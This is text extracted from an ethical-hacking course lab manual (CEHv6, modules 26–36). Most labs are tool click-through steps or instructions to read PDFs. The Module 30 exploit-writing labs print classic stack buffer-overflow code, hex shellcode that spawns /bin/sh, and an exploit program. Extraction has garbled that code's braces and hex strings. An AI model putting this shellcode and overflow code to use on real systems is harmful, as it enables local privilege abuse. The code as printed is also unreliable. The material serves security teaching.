Module 26. Penetration Testing

Module 26 Penetration Testing Page 633 Ethical Hacking and Countermeasures v6 Copyright

Lab 26-01 Objective: Use Azure Web Log to know details about your web traffic In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and Launch Azure Web Log Start a New Project from Project -> New. Enter the data and click Ok Page 634 Ethical Hacking and Countermeasures v6 Copyright

Start a New Log File from File -> Add Log Page 635 Ethical Hacking and Countermeasures v6 Copyright

Click Hits and Refs Click Site Info Page 636 Ethical Hacking and Countermeasures v6 Copyright

Click Current Month Click Previous Month Page 637 Ethical Hacking and Countermeasures v6 Copyright

Click Year Hits Click Hour Page 638 Ethical Hacking and Countermeasures v6 Copyright

Click System Country Page 639 Ethical Hacking and Countermeasures v6 Copyright

Lab 26-02 Objective: Use iinventory to capture hardware & software inventory and registry keys without having to leave your desk. In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and launch iinventory Click button Audit this PC in the left side pane. To start performance audit Page 640 Ethical Hacking and Countermeasures v6 Copyright

Performance Audit Report Click Scan Network button on the left side pane. Page 641 Ethical Hacking and Countermeasures v6 Copyright

Click Agent Builder Wizard on the left pane Set the options and click Next to forward to the next step Click Show Agent Config button on the left side pane Select an agent file from the list to display its summary Page 642 Ethical Hacking and Countermeasures v6 Copyright

Page 643 Ethical Hacking and Countermeasures v6 Copyright

Summary of agent configuration Page 644 Ethical Hacking and Countermeasures v6 Copyright

Lab 26-03 Objective: Use Link Utility to check links on Web sites and sustaining their efficiency. In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and launch Link Utility Click New Project button Page 645 Ethical Hacking and Countermeasures v6 Copyright

Click Import from HTML File. Select a file to import site addresses from. Click Ok Page 646 Ethical Hacking and Countermeasures v6 Copyright

Click Settings button to change the present options Page 647 Ethical Hacking and Countermeasures v6 Copyright

Click Scan button. Click Yes Page 648 Ethical Hacking and Countermeasures v6 Copyright

Page 649 Ethical Hacking and Countermeasures v6 Copyright

Click on the Report to generate the report file Page 650 Ethical Hacking and Countermeasures v6 Copyright

Lab 26-04 Objective: Use MaxCrypt to perform automated computer encryption. In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and launch MaxCrypt Click on New User to create a New User Now Login Page 651 Ethical Hacking and Countermeasures v6 Copyright

Click on the MaxCrypt icon in the windows system tray to access the MaxCrypt Quick Menu Click on Manage Volumes Page 652 Ethical Hacking and Countermeasures v6 Copyright

Click on Create Volume button to create a new volume Enter the data and click Create Volume Page 653 Ethical Hacking and Countermeasures v6 Copyright

The New Volume F:\ is created Page 654 Ethical Hacking and Countermeasures v6 Copyright

Click on the MaxCrypt icon in the windows system tray to access the MaxCrypt Quick Menu Click on Conceal Files Page 655 Ethical Hacking and Countermeasures v6 Copyright

Select a file and click Add button Page 656 Ethical Hacking and Countermeasures v6 Copyright

Finally Logout user Lab 26-05 Objective: Use Sniffem for monitoring network and capturing data traffic. In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and launch Sniffem Page 657 Ethical Hacking and Countermeasures v6 Copyright

Page 658 Ethical Hacking and Countermeasures v6 Copyright

Click Settings button to modify the present settings Click Capture button to start capturing the activities Click Stop button to stop capturing Page 659 Ethical Hacking and Countermeasures v6 Copyright

Lab 26-06 Objective: Use SQL Stripes to monitor and control your SQL Servers. In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and Launch SQL Stripes Click Yes Page 660 Ethical Hacking and Countermeasures v6 Copyright

Select Settings to modify the present options Page 661 Ethical Hacking and Countermeasures v6 Copyright

Select Server from the left side pane in the above window and click + symbol button in the right side pane to create a new server Enter details and click OK to create a new server Page 662 Ethical Hacking and Countermeasures v6 Copyright

Server 1 Created Check the Console Page 663 Ethical Hacking and Countermeasures v6 Copyright

Lab 26-07 Objective: Use TraceRoute Program to know the route over the network between two systems, listing of all the intermediate routers connected to its destination. In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and launch TraceRoute Input URL www.juggyboy.com in the Address bar. Click Trace Page 664 Ethical Hacking and Countermeasures v6 Copyright

Trace Result Repeat the same for other sites Page 665 Ethical Hacking and Countermeasures v6 Copyright

Lab 26-08 Objective: Use Windows Security Officer to restrict the resources for an application In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and Launch Windows Security Officer Initially click to change the administrator password Page 666 Ethical Hacking and Countermeasures v6 Copyright

Expand System 10 options in the left side pane Select Control Panel to modify the options Page 667 Ethical Hacking and Countermeasures v6 Copyright

Select Shell Restrictions to modify the options Select IE Browser Security to modify the options Page 668 Ethical Hacking and Countermeasures v6 Copyright

Page 669 Ethical Hacking and Countermeasures v6 Copyright

Select IE Cookies Viewer to modify the options Select Log User Activity to modify the options Page 670 Ethical Hacking and Countermeasures v6 Copyright

Select Restrict User Work Time to modify the options Select Folder Guard to modify the options Page 671 Ethical Hacking and Countermeasures v6 Copyright

Lab 26-09 In the CEHv6 Labs CD-ROM, navigate to Module 26 Open the Penetration Testing.pdf and read the content Develop a penetration test plan Page 672 Ethical Hacking and Countermeasures v6 Copyright

Lab 26-10 In the CEHv6 Labs CD-ROM, navigate to Module 26 Open the Software Penetration Testing.pdf and read the content Penetration testing today Page 673 Ethical Hacking and Countermeasures v6 Copyright

Module 27 Covert Hacking Page 674 Ethical Hacking and Countermeasures v6 Copyright

Lab 27-01 In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Covert Channel Analysis and Data Hiding in TCPIP.pdf and read the content Covert Channels Page 675 Ethical Hacking and Countermeasures v6 Copyright

Lab 27-02 In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf and read the content Firewall Piercing (Inside-Out Attacks) In the same PDF file, read the Examples of Covert Channel Attacks topic Page 676 Ethical Hacking and Countermeasures v6 Copyright

Lab 27-03 In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Covert Actions.pdf and read the content Covert channels are the principle enablers in a DDoS attack Page 677 Ethical Hacking and Countermeasures v6 Copyright

Lab 27-04 In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Covert channel vulnerabilities in anonymity systems.pdf and read the content Covert channels Page 678 Ethical Hacking and Countermeasures v6 Copyright

Module 30 Exploit Writing Page 679 Ethical Hacking and Countermeasures v6 Copyright

Lab 30-01 In the CEHv6 Labs CD-ROM, navigate to Module 30 Boot your computer using the BackTrack CD-ROM Open command shell and type: kedit example1.c Type the following in kedi: void function(int a, int b, int c) { char buffer1[5]; char buffer2[10]; } void main() { function(1,2,3); } Page 680 Ethical Hacking and Countermeasures v6 Copyright

Save the program in kedit. Compile the program by typing: $ gcc -S -o example1.s example1.c Page 681 Ethical Hacking and Countermeasures v6 Copyright

View the generated assembly file by typing: kedit example1.s Page 682 Ethical Hacking and Countermeasures v6 Copyright

Lab 30-02 example2.c In the CEHv6 Labs CD-ROM, navigate to Module 30 Create another program in kedit. Kedit example2.c Type the following: void function(char *str) { char buffer[16]; } strcpy(buffer,str); void main() { char large_string[256]; int i; for( i = 0; i < 255; i++) large_string[i] = 'A'; } function(large_string); Page 683 Ethical Hacking and Countermeasures v6 Copyright

Save the program in kedit. Page 684 Ethical Hacking and Countermeasures v6 Copyright

Compile the program by typing: $ gcc -o example2.s example2.c Page 685 Ethical Hacking and Countermeasures v6 Copyright

Run the program by typing:./example2.s Page 686 Ethical Hacking and Countermeasures v6 Copyright

You should see a segmentation fault error Page 687 Ethical Hacking and Countermeasures v6 Copyright

View the generated assembly file by typing: kedit example2.asm Page 688 Ethical Hacking and Countermeasures v6 Copyright

Lab 30-03 Objective: example3.c In the CEHv6 Labs CD-ROM, navigate to Module 30 Create another program in kedit. Kedit example3.c Type the following: void function(int a, int b, int c) { char buffer1[5]; char buffer2[10]; int *ret; ret = buffer1 + 12; (*ret) += 8; } void main() { int x; x = 0; function(1,2,3); x = 1; printf("%d\n",x); } Page 689 Ethical Hacking and Countermeasures v6 Copyright

Save the program and compile it by typing: $gcc o example3 example3.c Page 690 Ethical Hacking and Countermeasures v6 Copyright

Run the program by typing: $./example3 Page 691 Ethical Hacking and Countermeasures v6 Copyright

It should print one Disassemble main using gdb Type the following: $gdb example3 Page 692 Ethical Hacking and Countermeasures v6 Copyright

Type: disassemble main Page 693 Ethical Hacking and Countermeasures v6 Copyright

Page 694 Ethical Hacking and Countermeasures v6 Copyright

Lab 30-04 Objective: shellcode.c In the CEHv6 Labs CD-ROM, navigate to Module 26 Create another program in kedit Kedit shellcode.c Type the following: #include <stdio.h> void main() { char *name[2]; } name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); Page 695 Ethical Hacking and Countermeasures v6 Copyright

Compile the program by typing: $ gcc -o shellcode -ggdb -static shellcode.c Page 696 Ethical Hacking and Countermeasures v6 Copyright

Type: $ gdb shellcode Then, type disassemble main. Page 697 Ethical Hacking and Countermeasures v6 Copyright

Type disassemble _execve Page 698 Ethical Hacking and Countermeasures v6 Copyright

Page 699 Ethical Hacking and Countermeasures v6 Copyright

Lab 30-05 Objective: exit.c In the CEHv6 Labs CD-ROM, navigate to Module 26 Create another program in kedit. Kedit exit.c Type the following: #include <stdlib.h> void main() { } exit(0); Compile the program using: $ gcc -o exit -static exit.c View the generated code gdb by typing: gdb exit Then: disassemble _exit Page 700 Ethical Hacking and Countermeasures v6 Copyright

Lab 30-06 Objective: testsc.c In the CEHv6 Labs CD-ROM, navigate to Module 26 Create another program in kedit. Kedit testsc.c Type the following: char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x 00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\x cd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\x ff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; } Compile the program using: $ gcc -o testsc testsc.c Run the program by typing:./testsc You should see a shell launched. Type exit to exit the shell. Page 701 Ethical Hacking and Countermeasures v6 Copyright

Lab 30-07 Objective: exploit.c In the CEHv6 Labs CD-ROM, navigate to Module 26 Create another program in kedit Kedit exploit.c Type the following: char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b " "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd " "\x80\xe8\xdc\xff\xff\xff/bin/sh"; char large_string[128]; void main() { } char buffer[96]; int i; long *long_ptr = (long *) large_string; for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy(buffer,large_string); Compile the program using: $ gcc -o exploit exploit.c Run the program by typing:./exploit You should see a shell launched Type exit to exit the shell Page 702 Ethical Hacking and Countermeasures v6 Copyright

Module 34 Mac OS X Hacking Page 703 Ethical Hacking and Countermeasures v6 Copyright

Lab 34-01 In the CEHv6 Labs CD-ROM, navigate to Module 34 Open the Securing Mac OS X.pdf and read the content Read the Security Hardening Guideline topic Page 704 Ethical Hacking and Countermeasures v6 Copyright

In the same PDF file, read the Data Encryption topic Page 705 Ethical Hacking and Countermeasures v6 Copyright

Lab 34-02 In the CEHv6 Labs CD-ROM, navigate to Module 34 Open the Security in Mac OS X.pdf and read the content Read the Secure Default Settings topic Page 706 Ethical Hacking and Countermeasures v6 Copyright

In the same PDF file, read the Modern Security Architecture topic Page 707 Ethical Hacking and Countermeasures v6 Copyright

Next, read the Strong Authentication topic Page 708 Ethical Hacking and Countermeasures v6 Copyright

Lab 34-03 In the CEHv6 Labs CD-ROM, navigate to Module 34 Open the Mac OS X 10.4 Security Checklist.pdf and read the content Read the OS X Security Architecture topic Page 709 Ethical Hacking and Countermeasures v6 Copyright

In the same PDF file, read the User Account Security topic Page 710 Ethical Hacking and Countermeasures v6 Copyright

Next, read the Securing System Preferences topic Page 711 Ethical Hacking and Countermeasures v6 Copyright

Lab 34-04 In the CEHv6 Labs CD-ROM, navigate to Module 34 Open the Mac OS X Hacking Poses Wide Risk to Windows.pdf and read the content Read the Mac OS X Hacking Poses Wide Risk for Windows topic Page 712 Ethical Hacking and Countermeasures v6 Copyright

Module 35 Hacking Routers, Cable Modems, and Firewalls Page 713 Ethical Hacking and Countermeasures v6 Copyright

Lab 35-01 In the CEHv6 Labs CD-ROM, navigate to Module 35 Open the Chapter 9-Firewalls.pdf and read the content Read the FIREWALL IDENTIFICATION topic Page 714 Ethical Hacking and Countermeasures v6 Copyright

Next, read the PACKET FILTERING topic Page 715 Ethical Hacking and Countermeasures v6 Copyright

Lab 35-02 In the CEHv6 Labs CD-ROM, navigate to Module 35 Open the CISCO ROUTERS AS TARGETS.pdf and read the content Read the Compromised Router Sniffing topic Page 716 Ethical Hacking and Countermeasures v6 Copyright

In the same PDF file, read the Why we need to protect router resources topic Next, read the Router Audit Tool topic Page 717 Ethical Hacking and Countermeasures v6 Copyright

Lab 35-03 In the CEHv6 Labs CD-ROM, navigate to Module 35 Open the Cisco Router Security Best Practices.pdf and read the content Read the Access management topic Page 718 Ethical Hacking and Countermeasures v6 Copyright

In the same PDF file, read the SNTP Security topic Page 719 Ethical Hacking and Countermeasures v6 Copyright

Next, read the Access control lists topic Page 720 Ethical Hacking and Countermeasures v6 Copyright

Lab 35-04 In the CEHv6 Labs CD-ROM, navigate to Module 35 Open the 8 steps to protect your Cisco router.pdf and read the content Page 721 Ethical Hacking and Countermeasures v6 Copyright

In the same PDF file, read the Encrypt all passwords topic Page 722 Ethical Hacking and Countermeasures v6 Copyright

Module 36 Hacking Mobile Phones, PDA, and Handheld Devices Page 723 Ethical Hacking and Countermeasures v6 Copyright

Lab 36-01 In the CEHv6 Labs CD-ROM, navigate to Module 36 Open the Take Control of Your iphone.pdf and read the content Read the QUICK START TO TAKING CONTROL OF AN iphone topic Page 724 Ethical Hacking and Countermeasures v6 Copyright

In the same PDF file, read the 8 QUICK TROUBLESHOOTING STEPS topic Page 725 Ethical Hacking and Countermeasures v6 Copyright

Next, read the AVOID NAVIGATION AND TYPING HASSLES topic Page 726 Ethical Hacking and Countermeasures v6 Copyright

Lab 36-02 In the CEHv6 Labs CD-ROM, navigate to Module 36 Open the iphone Hardware Unlock.pdf and read the content Page 727 Ethical Hacking and Countermeasures v6 Copyright

Lab 36-03 In the CEHv6 Labs CD-ROM, navigate to Module 36 Open the How to Unlock an iphone.pdf and read the content Page 728 Ethical Hacking and Countermeasures v6 Copyright

Lab 36-04 In the CEHv6 Labs CD-ROM, navigate to Module 36 Open the The Anatomy of a Hack.pdf and read the content. Read the Understanding the Threats to Your Mobile Workforce topic Page 729 Ethical Hacking and Countermeasures v6 Copyright

In the same PDF file, read the Anatomy of a Hack Video Companion Guide topic Page 730 Ethical Hacking and Countermeasures v6 Copyright

Lab 36-05 In the CEHv6 Labs CD-ROM, navigate to Module 36 Open the Mobile Handset Security.pdf and read the content Read the Security issues on mobile devices topic Page 731 Ethical Hacking and Countermeasures v6 Copyright

In the same PDF file, read the Threats and Attacks topic Page 732 Ethical Hacking and Countermeasures v6 Copyright

Lab 36-06 In the CEHv6 Labs CD-ROM, navigate to Module 36 Open the Mobile Malware Threats and Prevention.pdf and read the content Page 733 Ethical Hacking and Countermeasures v6 Copyright